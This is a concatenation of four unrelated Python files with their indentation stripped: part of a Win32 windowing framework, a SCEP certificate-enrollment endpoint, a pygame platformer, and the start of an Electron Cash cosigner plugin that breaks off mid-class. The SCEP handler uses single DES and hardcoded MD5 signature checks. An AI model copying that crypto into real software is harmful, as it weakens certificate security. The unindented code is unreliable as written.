try:
return DefWindowProc(hWnd, nMsg, wParam, lParam) #windows default processing
except:
print(('ERROR perform default processing: DefWindowProc(%d, %d, %d, %d)' % (hWnd, nMsg, wParam, lParam)))
else:
return result
except:
try:
import traceback
traceback.print_exc()
except:
pass #this happens when the python runtime is already exitting, but we are still registered
#as a window proc and windows keeps calling the callback
cGlobalWndProc = WNDPROC(globalWndProc)
def handle(obj):
if not obj:
return NULL
elif hasattr(obj, 'handle'):
return obj.handle
else:
return obj
def instanceFromHandle(handle):
return hndlMap.get(handle, None)
def instanceOrHandle(handle):
return hndlMap.get(handle, handle)
def windowFromHandle(handle):
"""returns None if handle = 0, the python Window instance if
handle is known, or a new pseudo window if handle != 0 and not known"""
if not handle:
return None
window = hndlMap.get(handle, None)
if not window:
window = Window(hWnd = handle)
return window
class WindowsObject(object):
m_handle = 0
def __init__(self, handle, managed = True):
"""managed objects are stored in a global map so that they can
be looked up by their handle, also this allows for calling the
appropriate destructor function (__dispose__) whenever the object
becomes garbage"""
self.m_handle = handle
if managed:
hndlMap[handle] = self
handle = property(lambda self: self.m_handle)
def __str__(self):
return '<%s handle: %d>' % (self.__class__.__name__, self.handle)
def __equals__(self, other):
return self.handle == other.handle
class Event(object):
def __init__(self, hWnd, nMsg, wParam, lParam):
self.hWnd = hWnd
self.nMsg = nMsg
self.lParam = lParam
self.wParam = wParam
self.handled = 0
def structure(self, nmStructure):
return nmStructure.from_address(int(self.lParam))
def __str__(self):
return "<event hWnd: %d, nMsg: %d, lParam: %d, wParam: %d>" % (self.hWnd, self.nMsg, self.lParam, self.wParam)
class MSG_MAP(list):
def __init__(self, entries):
list.__init__(self, entries)
self._msg_map_ = {}
for entry in self:
self.append(entry)
def append(self, entry):
entry.__install__(self)
def Handle(self, receiver, hWnd, nMsg, wParam, lParam, clazz):
handler = self._msg_map_.get(nMsg, None)
if handler:
event = Event(hWnd, nMsg, wParam, lParam)
event.handled = True #the presence of a handler means that by default we assume the event to be handled
#if the handler wants to force further processing by parent class map
#the handler will set event.handled to False
result = handler(receiver, event)
if event.handled:
if result == None:
return (True, NULL)
else:
return (True, int(result))
return (False, NULL)
def HandleBaseClasses(self, receiver, hWnd, nMsg, wParam, lParam, clazz):
for baseClass in clazz.__bases__:
if issubclass(baseClass, Window):
handled, result = baseClass._msg_map_.Dispatch(receiver, hWnd, nMsg, wParam, lParam, baseClass)
if handled:
return (True, result)
return (False, NULL)
def Dispatch(self, receiver, hWnd, nMsg, wParam, lParam, clazz = None):
clazz = clazz or receiver.__class__
handled, result = self.Handle(receiver, hWnd, nMsg, wParam, lParam, clazz)
if handled:
return (True, result)
handled, result = self.HandleBaseClasses(receiver, hWnd, nMsg, wParam, lParam, clazz)
if handled:
return (True, result)
#nobody handled msg
return (False, NULL)
def DispatchMSG(self, receiver, msg):
return self.Dispatch(receiver, msg.hWnd, msg.message, msg.wParam, msg.lParam)
def __str__(self):
return str(self._msg_map_)
class WindowType(type):
def __init__(cls, name, bases, dct):
#make sure every window class has its own msg map
#~ if not dct.has_key('_msg_map_'):
if not '_msg_map_' in dct:
cls._msg_map_ = MSG_MAP([])
super(WindowType, cls).__init__(name, bases, dct)
#see if decorators were used to map events to handlers,
#and install the handlers in the msgmap
for item in list(dct.values()):
if hasattr(item, 'handler'):
cls._msg_map_.append(item.handler)
hInstance = GetModuleHandle(None)
wndClasses = []
RCDEFAULT = RECT(top = CW_USEDEFAULT, left = CW_USEDEFAULT, right = 0, bottom = 0)
class Window(WindowsObject, metaclass=WindowType):
_window_class_ = ''
_window_title_ = ''
_window_style_ = WS_OVERLAPPEDWINDOW | WS_VISIBLE
_window_style_ex_ = 0
_window_icon_ = LoadIcon(NULL, MAKEINTRESOURCE(IDI_APPLICATION))
_window_icon_sm_ = LoadIcon(NULL, MAKEINTRESOURCE(IDI_APPLICATION))
_window_background_ = 0
_window_class_style_ = 0
_window_style_clip_children_and_siblings_ = True
_window_dbg_msg_ = False
_window_width_ = CW_USEDEFAULT
_window_height_ = CW_USEDEFAULT
__dispose__ = DestroyWindow
def __init__(self, title = '', style = None, exStyle = None, parent = None, menu = None, rcPos = RCDEFAULT, orStyle = None, orExStyle = None, nandStyle = None, nandExStyle = None, width = CW_USEDEFAULT, height = CW_USEDEFAULT, hWnd = None):
if hWnd: #wrapping instead of creating
self.m_handle = hWnd #note client is responsible for deleting
return
windowClassExists = False
cls = WNDCLASSEX()
if self._window_class_:
if GetClassInfo(hInstance, self._window_class_, byref(cls)):
windowClassExists = True
#determine whether we are going to subclass an existing window class
#or create a new windowclass
self._issubclassed_ = self._window_class_ and windowClassExists
atom = 0
if not self._issubclassed_:
#if no _window_class_ is given, generate a new one
className = self._window_class_ or "venster_wtl_%d" % id(self.__class__)
cls = WNDCLASSEX()
cls.cbSize = sizeof(cls)
cls.lpszClassName = className
cls.hInstance = hInstance
cls.lpfnWndProc = cGlobalWndProc
cls.style = self._window_class_style_
cls.hbrBackground = self._window_background_
cls.hIcon = handle(self._window_icon_)
cls.hIconSm = handle(self._window_icon_sm_)
cls.hCursor = LoadCursor(NULL, MAKEINTRESOURCE(IDC_ARROW))
#cls structure needs to stay on heap
wndClasses.append(cls)
atom = RegisterClassEx(pointer(cls))
#~ print('atom %d' % atom)
else:
#subclass existing window class.
className = self._window_class_
title = title or self._window_title_
if style is None:
style = self._window_style_
if exStyle is None:
exStyle = self._window_style_ex_
if orStyle:
style |= orStyle
if orExStyle:
exStyle |= orExStyle
if self._window_style_clip_children_and_siblings_:
style |= WS_CLIPCHILDREN
style |= WS_CLIPSIBLINGS
if nandStyle:
style &= ~nandStyle
left, right = rcPos.left, rcPos.right
top, bottom = rcPos.top, rcPos.bottom
if width == CW_USEDEFAULT:
width = self._window_width_
if left == CW_USEDEFAULT and width != CW_USEDEFAULT:
right = CW_USEDEFAULT + width
if height == CW_USEDEFAULT:
height = self._window_height_
if top == CW_USEDEFAULT and height != CW_USEDEFAULT:
bottom = CW_USEDEFAULT + height
#for normal windows created trough venster, the mapping between window handle
#and window instance will be established by processing the WM_NCCREATE msg
#and looking up the instance in the createhndlMap
createHndlMap[id(self)] = self
wm_create_param = id(self)
if className == 'msctls_trackbar32':
wm_create_param = 0
hWnd = 0
if atom:
hWnd = CreateWindowEx_atom(exStyle, atom, title, style, left, top, right - left, bottom - top, handle(parent), handle(menu), hInstance, wm_create_param)
else:
hWnd = CreateWindowEx(exStyle, className, title, style, left, top, right - left, bottom - top, handle(parent), handle(menu), hInstance, wm_create_param)
del createHndlMap[id(self)]
if self._issubclassed_:
#for subclassed windows, we establish the instance <-> handle mapping here
WindowsObject.__init__(self, hWnd)
self._old_wnd_proc_ = self.SubClass(cGlobalWndProc)
def SubClass(self, newWndProc):
return SetWindowLong(self.handle, GWL_WNDPROC, newWndProc)
class Interceptor(object):
def __init__(self, receiver, window, msg_map, nMsg = [WM_NOTIFY]):
self.nMsg = dict([(x, 1) for x in nMsg])
self.newProc = WNDPROC(self.WndProc)
if window:
self.oldProc = window.SubClass(self.newProc)
self._msg_map_ = msg_map
self.receiver = receiver
def dispose(self):
self.WndProc = lambda self, hWnd, nMsg, wParam, lParam: 0
del self.receiver
del self._msg_map_
del self.newProc
def WndProc(self, hWnd, nMsg, wParam, lParam):
if nMsg in self.nMsg and hasattr(self, 'receiver'):
handled, res = self._msg_map_.Dispatch(self.receiver, hWnd, nMsg, wParam, lParam)
else:
handled = 0
if not handled:
return CallWindowProc(self.oldProc, hWnd, nMsg, wParam, lParam)
else:
return res
def Intercept(self, receiver, msgMap, nMsg = [WM_NOTIFY]):
return Window.Interceptor(self, receiver, msgMap, nMsg = nMsg)
def InterceptParent(self, nMsg = [WM_NOTIFY]):
"""intercepts msg proc in order to reroute msgs to self"""
self._interceptParent = self.Intercept(self.GetParent(), self._msg_map_, nMsg = nMsg)
def dispose(self):
if hasattr(self, '_interceptParent'):
self._interceptParent.dispose()
del self._interceptParent
def WndProc(self, hWnd, nMsg, wParam, lParam):
if self._window_dbg_msg_:
print(('%s, %d, %d, %d, %d' % (repr(self), hWnd, nMsg, wParam, lParam)))
return self._msg_map_.Dispatch(self, hWnd, nMsg, wParam, lParam)
def IsDialogMessage(self, lpmsg):
return IsDialogMessage(self.handle, lpmsg)
def PreTranslateMessage(self, msg):
return 0
def TranslateAccelerator(self, msg):
return 0
def __repr__(self):
return '<Window hWnd: %d>' % self.handle
#this is the base class for all handlers defined in msg maps
class HANDLER(object):
#the handler is given in the msg map as a unbound (static) method
#on some class X, to enable a derived class to override a handler method
#of a parent class Y, a lambda trick is needed to pick the correct handler
#(that of the base class)
def __init__(self, handler):
#TODO how to determine if handler is a lambda or a named function without
#looking at '__name__'?:
if not handler:
self.m_handler = None
elif handler.__name__ == '<lambda>':
self.m_handler = handler
else:#trick to make handler 'virtual' again
self.m_handler = lambda self, event: getattr(self, handler.__name__)(event)
def __call__(self, receiver, event):
return self.handler(receiver, event)
#handler = property(lambda self: self.m_handler)
def getHandler(self):
return self.m_handler
def setHandler(self, value):
self.m_handler = value
handler = property(getHandler, setHandler)
#Handler for normal window messages (e.g. WM_SIZE, WM_CLOSE, WM_PAINT etc)
class MSG_HANDLER(HANDLER):
def __init__(self, msg, handler):
HANDLER.__init__(self, handler)
self.msg = msg
def __install__(self, msgMap):
msgMap._msg_map_[self.msg] = self
class NTF_MAP(dict):
def __call__(self, receiver, event):
nmhdr = NMHDR.from_address(int(event.lParam))
handler = self.get(str(nmhdr.code), None)
if handler:
event.nmhdr = nmhdr
return handler(receiver, event)
else:
event.handled = 0
return 0
#handler for notification messages
#handles all notifications with the given code
class NTF_HANDLER(HANDLER):
def __init__(self, code, handler):
HANDLER.__init__(self, handler)
self.code = code
def __install__(self, msgMap):
notifMap = msgMap._msg_map_.setdefault(WM_NOTIFY, NTF_MAP())
notifMap[str(self.code)] = self
#support for WM_COMMAND msgs
#cmd is a map from id -> [(code, handler), ...]
#first handler in the list that matches the code is fired
#if code == -1, than handler is fired for any code
class CMD_MAP(dict):
def __call__(self, receiver, event):
code = HIWORD(event.wParam)
id = LOWORD(event.wParam)
for handlerCode, handler in self.get(id, []):
if handlerCode == -1 or handlerCode == code:
event.id = id
event.code = code
return handler(receiver, event)
#not handled
event.handled = 0
return 0
#maps command message based on control id AND notification code
class CMD_HANDLER(HANDLER):
def __init__(self, id, code, handler):
HANDLER.__init__(self, handler)
self.id, self.code = id, code
def __install__(self, msgMap):
cmdMap = msgMap._msg_map_.setdefault(WM_COMMAND, CMD_MAP())
notifList = cmdMap.setdefault(self.id, [])
notifList.append((self.code, self))
#maps command message based on control id
class CMD_ID_HANDLER(HANDLER):
def __init__(self, id, handler):
HANDLER.__init__(self, handler)
self.id = id
def __install__(self, msgMap):
cmdMap = msgMap._msg_map_.setdefault(WM_COMMAND, CMD_MAP())
notifList = cmdMap.setdefault(self.id, [])
notifList.append((-1, self))
#deprecated, will be removed before 1.0
class CHAIN_MSG_MAP (object):
def __init__(self, msgMap): pass
def __install__(self, msgMap): pass
#decorator versions of the above
def msg_handler(msg):
def decorator_func(func):
func.handler = MSG_HANDLER(msg, func)
return func
return decorator_func
def cmd_handler(id, code = None):
def decorator_func(func):
if code:
func.handler = CMD_HANDLER(id, code, func)
else:
func.handler = CMD_ID_HANDLER(id, func)
return func
return decorator_func
def ntf_handler(code):
def decorator_func(func):
func.handler = NTF_HANDLER(code, func)
return func
return decorator_func
#TODO allow the addition of more specific filters
#TODO make filters weak so that remove filter is not needed
class MessageLoop:
def __init__(self):
self.m_filters = {}
def AddFilter(self, filterFunc):
self.m_filters[filterFunc] = 1
def RemoveFilter(self, filterFunc):
del self.m_filters[filterFunc]
def Run(self):
msg = MSG()
lpmsg = byref(msg)
while GetMessage(lpmsg, 0, 0, 0):
if not self.PreTranslateMessage(msg):
TranslateMessage(lpmsg)
DispatchMessage(lpmsg)
global quit
quit = True
def PreTranslateMessage(self, msg):
for filter in list(self.m_filters.keys()):
if list(filter(msg)):
return 1
return 0
theMessageLoop = MessageLoop()
def GetMessageLoop():
return theMessageLoop
def Run():
theMessageLoop.Run()
class Application(object):
def Run(self):
return Run()
def Quit(self, nExitCode = 0):
"""quits the application by posting the WM_QUIT message with the given
exitCode"""
PostQuitMessage(nExitCode)
def Exit(self, nExitCode = 0):
self.Quit(nExitCode)
|
|
import click
import falcon
import hashlib
import logging
import os
from asn1crypto import cms, algos
from asn1crypto.core import SetOf, PrintableString
from base64 import b64decode
from certidude import config
from oscrypto import keys, asymmetric, symmetric
from oscrypto.errors import SignatureError
from .utils import AuthorityHandler
from .utils.firewall import whitelist_subnets
logger = logging.getLogger(__name__)
# Monkey patch asn1crypto
class SetOfPrintableString(SetOf):
_child_spec = PrintableString
cms.CMSAttributeType._map['2.16.840.1.113733.1.9.2'] = "message_type"
cms.CMSAttributeType._map['2.16.840.1.113733.1.9.3'] = "pki_status"
cms.CMSAttributeType._map['2.16.840.1.113733.1.9.4'] = "fail_info"
cms.CMSAttributeType._map['2.16.840.1.113733.1.9.5'] = "sender_nonce"
cms.CMSAttributeType._map['2.16.840.1.113733.1.9.6'] = "recipient_nonce"
cms.CMSAttributeType._map['2.16.840.1.113733.1.9.7'] = "trans_id"
cms.CMSAttribute._oid_specs['message_type'] = SetOfPrintableString
cms.CMSAttribute._oid_specs['pki_status'] = SetOfPrintableString
cms.CMSAttribute._oid_specs['fail_info'] = SetOfPrintableString
cms.CMSAttribute._oid_specs['sender_nonce'] = cms.SetOfOctetString
cms.CMSAttribute._oid_specs['recipient_nonce'] = cms.SetOfOctetString
cms.CMSAttribute._oid_specs['trans_id'] = SetOfPrintableString
class SCEPError(Exception):
code = 25 # system failure
explaination = "General system failure"
class SCEPBadAlgo(SCEPError):
code = 0
explaination = "Unsupported algorithm in SCEP request"
class SCEPBadMessageCheck(SCEPError):
code = 1
explaination = "Integrity check failed for SCEP request"
class SCEPBadRequest(SCEPError):
code = 2
explaination = "Bad request"
class SCEPBadTime(SCEPError):
code = 3
explaination = "Bad time"
class SCEPBadCertId(SCEPError):
code = 4
explaination = "Certificate authority mismatch"
class SCEPDigestMismatch(SCEPBadMessageCheck):
explaination = "Digest mismatch"
class SCEPSignatureMismatch(SCEPBadMessageCheck):
explaination = "Signature mismatch"
class SCEPResource(AuthorityHandler):
@whitelist_subnets(config.SCEP_SUBNETS)
def on_get(self, req, resp):
operation = req.get_param("operation", required=True)
if operation == "GetCACert":
resp.body = keys.parse_certificate(self.authority.certificate_buf).dump()
resp.append_header("Content-Type", "application/x-x509-ca-cert")
return
elif operation == "GetCACaps":
# TODO: return renewal flag based on renewal subnets config option
resp.body = "Renewal\nMD5\nSHA-1\nSHA-256\nSHA-512\nDES3\n"
return
elif operation == "PKIOperation":
pass
else:
raise falcon.HTTPBadRequest(
"Bad request",
"Unknown operation %s" % operation)
# If we bump into exceptions later
encrypted_container = b""
attr_list = [
cms.CMSAttribute({
'type': "message_type",
'values': ["3"]
}),
cms.CMSAttribute({
'type': "pki_status",
'values': ["2"] # rejected
})
]
try:
info = cms.ContentInfo.load(b64decode(req.get_param("message", required=True)))
###############################################
### Verify signature of the outer container ###
###############################################
signed_envelope = info['content']
encap_content_info = signed_envelope['encap_content_info']
encap_content = encap_content_info['content']
# TODO: try except
current_certificate, = signed_envelope["certificates"]
signer, = signed_envelope["signer_infos"]
# TODO: compare cert to current one if we are renewing
digest_algorithm = signer["digest_algorithm"]["algorithm"].native
signature_algorithm = signer["signature_algorithm"]["algorithm"].native
if digest_algorithm not in ("md5", "sha1", "sha256", "sha512"):
raise SCEPBadAlgo()
if signature_algorithm != "rsassa_pkcs1v15":
raise SCEPBadAlgo()
message_digest = None
transaction_id = None
sender_nonce = None
for attr in signer["signed_attrs"]:
if attr["type"].native == "sender_nonce":
sender_nonce, = attr["values"]
elif attr["type"].native == "trans_id":
transaction_id, = attr["values"]
elif attr["type"].native == "message_digest":
message_digest, = attr["values"]
if getattr(hashlib, digest_algorithm)(encap_content.native).digest() != message_digest.native:
raise SCEPDigestMismatch()
if not sender_nonce:
raise SCEPBadRequest()
if not transaction_id:
raise SCEPBadRequest()
assert message_digest
msg = signer["signed_attrs"].dump(force=True)
assert msg[0] == 160
# Verify signature
try:
asymmetric.rsa_pkcs1v15_verify(
asymmetric.load_certificate(current_certificate.dump()),
signer["signature"].native,
b"\x31" + msg[1:], # wtf?!
"md5")
except SignatureError:
raise SCEPSignatureMismatch()
###############################
### Decrypt inner container ###
###############################
info = cms.ContentInfo.load(encap_content.native)
encrypted_envelope = info['content']
encrypted_content_info = encrypted_envelope['encrypted_content_info']
iv = encrypted_content_info['content_encryption_algorithm']['parameters'].native
if encrypted_content_info['content_encryption_algorithm']["algorithm"].native != "des":
raise SCEPBadAlgo()
encrypted_content = encrypted_content_info['encrypted_content'].native
recipient, = encrypted_envelope['recipient_infos']
if recipient.native["rid"]["serial_number"] != self.authority.certificate.serial_number:
raise SCEPBadCertId()
key = asymmetric.rsa_pkcs1v15_decrypt(
self.authority.private_key,
recipient.native["encrypted_key"])
if len(key) == 8: key = key * 3 # Convert DES to 3DES
buf = symmetric.tripledes_cbc_pkcs5_decrypt(key, encrypted_content, iv)
_, _, common_name = self.authority.store_request(buf, overwrite=True)
logger.info("SCEP client from %s requested with %s digest algorithm, %s signature",
req.context["remote_addr"], digest_algorithm, signature_algorithm)
cert, buf = self.authority.sign(common_name, profile=config.PROFILES["gw"], overwrite=True)
signed_certificate = asymmetric.load_certificate(buf)
content = signed_certificate.asn1.dump()
except SCEPError as e:
attr_list.append(cms.CMSAttribute({
'type': "fail_info",
'values': ["%d" % e.code]
}))
logger.info("Failed to sign SCEP request due to: %s" % e.explaination)
else:
##################################
### Degenerate inner container ###
##################################
degenerate = cms.ContentInfo({
'content_type': "signed_data",
'content': cms.SignedData({
'version': "v1",
'certificates': [signed_certificate.asn1],
'digest_algorithms': [cms.DigestAlgorithm({
'algorithm': digest_algorithm
})],
'encap_content_info': {
'content_type': "data",
'content': cms.ContentInfo({
'content_type': "signed_data",
'content': None
}).dump()
},
'signer_infos': []
})
})
################################
### Encrypt middle container ###
################################
key = os.urandom(8)
iv, encrypted_content = symmetric.des_cbc_pkcs5_encrypt(key, degenerate.dump(), os.urandom(8))
assert degenerate.dump() == symmetric.tripledes_cbc_pkcs5_decrypt(key*3, encrypted_content, iv)
ri = cms.RecipientInfo({
'ktri': cms.KeyTransRecipientInfo({
'version': "v0",
'rid': cms.RecipientIdentifier({
'issuer_and_serial_number': cms.IssuerAndSerialNumber({
'issuer': current_certificate.chosen["tbs_certificate"]["issuer"],
'serial_number': current_certificate.chosen["tbs_certificate"]["serial_number"],
}),
}),
'key_encryption_algorithm': {
'algorithm': "rsa"
},
'encrypted_key': asymmetric.rsa_pkcs1v15_encrypt(
asymmetric.load_certificate(current_certificate.chosen.dump()), key)
})
})
encrypted_container = cms.ContentInfo({
'content_type': "enveloped_data",
'content': cms.EnvelopedData({
'version': "v1",
'recipient_infos': [ri],
'encrypted_content_info': {
'content_type': "data",
'content_encryption_algorithm': {
'algorithm': "des",
'parameters': iv
},
'encrypted_content': encrypted_content
}
})
}).dump()
attr_list = [
cms.CMSAttribute({
'type': "message_digest",
'values': [getattr(hashlib, digest_algorithm)(encrypted_container).digest()]
}),
cms.CMSAttribute({
'type': "message_type",
'values': ["3"]
}),
cms.CMSAttribute({
'type': "pki_status",
'values': ["0"] # ok
})
]
finally:
##############################
### Signed outer container ###
##############################
attrs = cms.CMSAttributes(attr_list + [
cms.CMSAttribute({
'type': "recipient_nonce",
'values': [sender_nonce]
}),
cms.CMSAttribute({
'type': "trans_id",
'values': [transaction_id]
})
])
signer = cms.SignerInfo({
"signed_attrs": attrs,
'version': "v1",
'sid': cms.SignerIdentifier({
'issuer_and_serial_number': cms.IssuerAndSerialNumber({
'issuer': self.authority.certificate.issuer,
'serial_number': self.authority.certificate.serial_number,
}),
}),
'digest_algorithm': algos.DigestAlgorithm({'algorithm': digest_algorithm}),
'signature_algorithm': algos.SignedDigestAlgorithm({'algorithm': "rsassa_pkcs1v15"}),
'signature': asymmetric.rsa_pkcs1v15_sign(
self.authority.private_key,
b"\x31" + attrs.dump()[1:],
digest_algorithm
)
})
resp.append_header("Content-Type", "application/x-pki-message")
resp.body = cms.ContentInfo({
'content_type': "signed_data",
'content': cms.SignedData({
'version': "v1",
'certificates': [self.authority.certificate],
'digest_algorithms': [cms.DigestAlgorithm({
'algorithm': digest_algorithm
})],
'encap_content_info': {
'content_type': "data",
'content': encrypted_container
},
'signer_infos': [signer]
})
}).dump()
|
|
import pygame
import time
# todo
# wrap round off edge of screen
# make screen scrolling smoother?
# add audio?
# new character
# simple character animation?
# tune movement to make it feel good
# add more platforms
# add more items and different types
# fall down to a crisis
# remove platforms that scroll off the bottom of the screen, so player freefalls after fall
pygame.init()
WIDTH = 800
HEIGHT = 1800
SCREEN_HEIGHT = 600
WHITE = (255, 255, 255)
crisis = 0
gameover=False
pygame.key.set_repeat(50,50)
screen = pygame.display.set_mode((WIDTH, SCREEN_HEIGHT))
background_image = pygame.image.load ("blue-sky.jpg")
gameover_image = pygame.image.load ("turtel 2.png")
jumper = pygame.sprite.Sprite()
jumper.image = pygame.image.load("turtle.png")
jumper.rect = jumper.image.get_rect()
jumper.rect.y = 1500
screen.fill(WHITE)
clock = pygame.time.Clock()
# as the player moves up this decreases and the screen scrolls upwards
camera_offset = 1200
#bottom of the screen
bottom = pygame.sprite.Sprite()
bottom.rect = pygame.Rect(-50,HEIGHT - 50, WIDTH+100, 50)
def create_platform(x, y):
width = 200
height = 30
platform = pygame.sprite.Sprite();
platform.rect = pygame.Rect(x, y, width, height)
return platform
def create_item(type, x, y):
item = pygame.sprite.Sprite()
item.image = pygame.image.load("coin.png")
item.rect = item.image.get_rect()
item.rect.x = x
item.rect.y = y
return item
def to_camera_space(rect):
return pygame.Rect(rect.x, rect.y-camera_offset, rect.width, rect.height)
## items!!!
items = pygame.sprite.OrderedUpdates()
items.add(create_item("coin", 400,1450))
items.add(create_item("coin", 600,1050))
items.add(create_item("coin", 200,850))
items.add(create_item("coin", 300,700))
default_platforms = []
platform_colour = (200, 140, 80)
default_platforms.append(create_platform(200, 1200+500))
default_platforms.append(create_platform(400, 1200+300))
default_platforms.append(create_platform(500, 1000+100))
default_platforms.append(create_platform(200, 1200+100))
default_platforms.append(create_platform(600, 1000+100))
default_platforms.append(create_platform(200, 890))
default_platforms.append(create_platform(100, 700))
default_platforms.append(bottom)
platforms = default_platforms[::]
## when player presses jump button we set jump_frame to 0
## then each frame we apply the position diff stored in the
## jump_deltas to produce a parabolic jump
## then when we're finished we set jump_frame back to -1 ready to jump again
jump_frame = -1 # not jumping
jump_deltas = [ x**2 / 1.5 for x in range(10,0,-1)]
## this tries to move the player, if we collide with a platform
## we don't allow the movement, if we collide with an item we
## collect it
score = 0
def apply_move(move_x,move_y):
global score
global camera_offset
jumper.rect.x += move_x
jumper.rect.y += move_y
jumper_group = pygame.sprite.GroupSingle(jumper)
if pygame.sprite.groupcollide(jumper_group, platforms, False, False):
jumper.rect.x -= move_x
jumper.rect.y -= move_y
if pygame.sprite.groupcollide(jumper_group, items, False, True):
print("Item collected!!" + str(score))
score +=1
#print("y={:d} camera_offset={:f}" .format(jumper.rect.y, camera_offset) )
# if player is more than halfway up the screen, scroll the screen upwards
if jumper.rect.y < camera_offset + SCREEN_HEIGHT / 4 :
camera_offset = jumper.rect.y - SCREEN_HEIGHT / 3
# if player is falling off bottom of screen scroll screen downwards
if jumper.rect.y + jumper.rect.height > camera_offset + SCREEN_HEIGHT:
camera_offset = jumper.rect.y + jumper.rect.height - SCREEN_HEIGHT + 20
pygame.display.update()
gravity = 5
move = 15 # speed
game_running = True
while game_running:
clock.tick(30) # limit framerate to 30fps
apply_move(0, gravity)
for event in pygame.event.get():
if event.type == pygame.QUIT:
game_running = False
elif event.type == pygame.KEYDOWN and event.key == pygame.K_ESCAPE:
game_running = False
keys = pygame.key.get_pressed();
if keys[pygame.K_UP] or keys[pygame.K_SPACE] or keys[pygame.K_w]:
# if the player is just above or on a platform we allow a jump
# to test we form a rectangle just under the player and collide it against
# the platforms
feet = pygame.sprite.Sprite()
feet.rect = pygame.Rect(jumper.rect.x, jumper.rect.y+3+jumper.rect.height,
jumper.rect.width, 3)
if pygame.sprite.groupcollide([feet], platforms, False, False):
jump_frame = 0 # player is allowed to jump - start the jump sequence
if keys[pygame.K_LEFT] or keys[pygame.K_a]:
apply_move(-move, 0)
if keys[pygame.K_RIGHT] or keys[pygame.K_d]:
apply_move(move, 0)
if keys[pygame.K_y] and crisis:
crisis = 0
platforms = default_platforms[::]
jumper.rect.y = 1200
score = 0
if keys[pygame.K_n] and crisis:
gameover= True
for event in pygame.event.get():
if event.type == pygame.QUIT:
game_running = False
elif event.type == pygame.KEYDOWN and event.key == pygame.K_ESCAPE:
game_running = False
#print("{:f}".format(jumper.rect.x))
if jumper.rect.x < 0 :
jumper.rect.x = 800
elif jumper.rect.x > 800 :
jumper.rect.x = 0
for index,platform in enumerate(platforms):
if platform.rect.y > camera_offset+SCREEN_HEIGHT:
print("kill platform")
del platforms[index]
if pygame.sprite.spritecollide(jumper,[bottom],False):
crisis = 1
screen.fill(WHITE)
if jump_frame != -1:
apply_move(0, -jump_deltas[jump_frame])
jump_frame += 1
if len(jump_deltas) <= jump_frame:
jump_frame = -1
if gameover:
screen.blit(gameover_image,(0,0))
elif crisis:
font = pygame.font.Font(None, 36)
text_image = font.render("Give up your score to buy medicine for children in need", True,(153, 45, 189))
screen.blit(text_image,(100,400))
text_image = font.render("Yes", True,(153, 45, 189))
screen.blit(text_image,(200,500))
text_image = font.render("No", True,(153, 45, 189))
screen.blit(text_image,(300,500))
else:
screen.blit(background_image,(0,0))
screen.blit(jumper.image, to_camera_space(jumper.rect))
font = pygame.font.Font(None, 36)
text_image = font.render("score: "+str(score), True,(153, 45, 189))
text_rect = text_image.get_rect(centerx=100, centery=50)
screen.blit(text_image, text_rect)
for platform in platforms:
screen.fill(platform_colour, to_camera_space(platform.rect))
for item in items:
screen.blit(item.image, to_camera_space(item.rect))
pygame.display.update()
pygame.quit()
|
|
#!/usr/bin/env python3
#
# Electrum - lightweight Bitcoin client
# Copyright (C) 2014 Thomas Voegtlin
#
# Electron Cash - lightweight Bitcoin Cash client
# Copyright (C) 2019 The Electron Cash Developers
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import sys, traceback, queue
from xmlrpc.client import ServerProxy, Transport
import http.client
from PyQt5.QtGui import *
from PyQt5.QtCore import *
from PyQt5.QtWidgets import *
from electroncash import bitcoin, util, keystore
from electroncash import transaction
from electroncash.plugins import BasePlugin, hook
from electroncash.i18n import _
from electroncash.wallet import Multisig_Wallet
from electroncash.util import bh2u, bfh, Weak, InvalidPassword, print_error
from electroncash_gui.qt.transaction_dialog import show_transaction, TxDialog
# Workarounds to the fact that xmlrpc.client doesn't take a timeout= arg.
class TimeoutTransport(Transport):
def __init__(self, timeout=2.0, *l, **kw):
super().__init__(*l, **kw)
self.timeout = timeout
def make_connection(self, host):
return http.client.HTTPConnection(host, timeout=self.timeout)
class TimeoutServerProxy(ServerProxy):
def __init__(self, uri, timeout=2.0, *l, **kw):
kw['transport'] = TimeoutTransport(timeout=timeout, use_datetime=kw.get('use_datetime', False))
super().__init__(uri, *l, **kw)
# /end timeout= Workarounds
PORT = 8081
HOST = 'sync.imaginary.cash'
class Listener(util.DaemonThread):
def __init__(self, state):
super().__init__()
self.daemon = True
self.state_ref = Weak.ref(state)
self.received = set()
self.keyhashes = []
self.timeoutQ = queue.Queue() # this queue's sole purpose is to provide an interruptible sleep
def diagnostic_name(self):
wname = str(self.state_ref() and self.state_ref().window_ref() and self.state_ref().window_ref().diagnostic_name())
return super().diagnostic_name() + "@" + wname
def set_keyhashes(self, keyhashes):
self.keyhashes = keyhashes
def clear(self, keyhash):
state = self.state_ref()
if state: state.server.delete(keyhash)
try: self.received.remove(keyhash)
except (ValueError, KeyError): pass
def run(self):
self.print_error("started.")
while self.running:
try:
if not self.keyhashes:
self.timeoutQ.get(timeout=2.0) # this shouldn't ever happen but.. poll until ready.
continue
for keyhash in self.keyhashes:
if keyhash in self.received:
# already seen.. avoids popup window spam
continue
try:
message = self.state_ref() and self.state_ref().server.get(keyhash)
except Exception as e:
self.print_error("cannot contact cosigner pool", repr(e))
break
if message:
self.received.add(keyhash)
self.print_error("received message for", keyhash)
self.state_ref() and self.state_ref().cosigner_receive_signal.emit(keyhash, message)
# poll every 10 seconds
self.timeoutQ.get(timeout=10.0)
except queue.Empty:
# timed out, continue
continue
self.print_error("exiting.")
def stop(self):
# extends DaemonThread by also writing to the timeoutQ to wake up the sleeping thread, if any
super().stop()
self.timeoutQ.put(None) # wake up sleeper, if any
def start(self):
